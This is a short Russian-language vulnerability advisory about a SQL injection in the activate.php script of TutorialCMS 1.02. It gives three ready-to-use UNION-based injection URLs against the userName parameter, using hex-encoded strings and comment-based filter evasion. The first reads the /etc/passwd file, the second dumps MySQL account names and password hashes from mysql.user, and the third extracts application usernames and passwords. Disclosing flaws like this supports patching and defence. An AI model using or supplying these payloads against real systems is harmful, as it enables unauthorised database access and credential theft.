Программа: TutorialCMS 1.02
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием activate.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
/etc/password:
http://[host]/activate.php?userName='/* */union/**/select/**/1,2,3,4,load_file(0x2f6574632f706173737764), 6,7,8,9,9,9,9,9/*
Имя и пароль пользователя из mysql.user:
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat(user, 0x203a3a20,password),6,7,8,9,9,9,9,9/**/from/**/mysql.user/*
http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4, concat(0x757365723a20,username,0x20706173733a20,password),6 ,7,8,9,9,9,9,9/**/from/**/users/*
